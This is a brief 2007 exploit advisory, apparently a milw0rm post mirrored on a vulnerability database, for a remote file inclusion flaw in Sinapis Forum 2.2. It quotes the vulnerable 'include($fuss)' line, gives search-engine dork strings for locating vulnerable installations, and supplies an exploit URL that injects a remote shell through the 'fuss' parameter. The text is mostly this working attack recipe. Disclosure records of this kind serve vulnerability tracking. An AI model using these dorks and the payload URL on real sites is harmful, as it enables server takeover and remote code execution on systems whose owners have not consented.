Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16184
HistoryFeb 25, 2007 - 12:00 a.m.

Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability

2007-02-2500:00:00
vulners.com
35

Sinapis Forum 2.2


Found by kezzap66345 *


Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=forum&title=Sinapis%20ForumG�stebuch%20<img%20src=/pics/gbscr.gif>


Dork="Sinapis by scripter.ch"
Dork1="inurl:sinapis.php"


ERROR:
if($fuss != ""){include($fuss);} <<< rfi coded


RFI:

http://SITE.com/path//sinapis.php?fuss=[SHELL]

milw0rm.com [2007-02-23]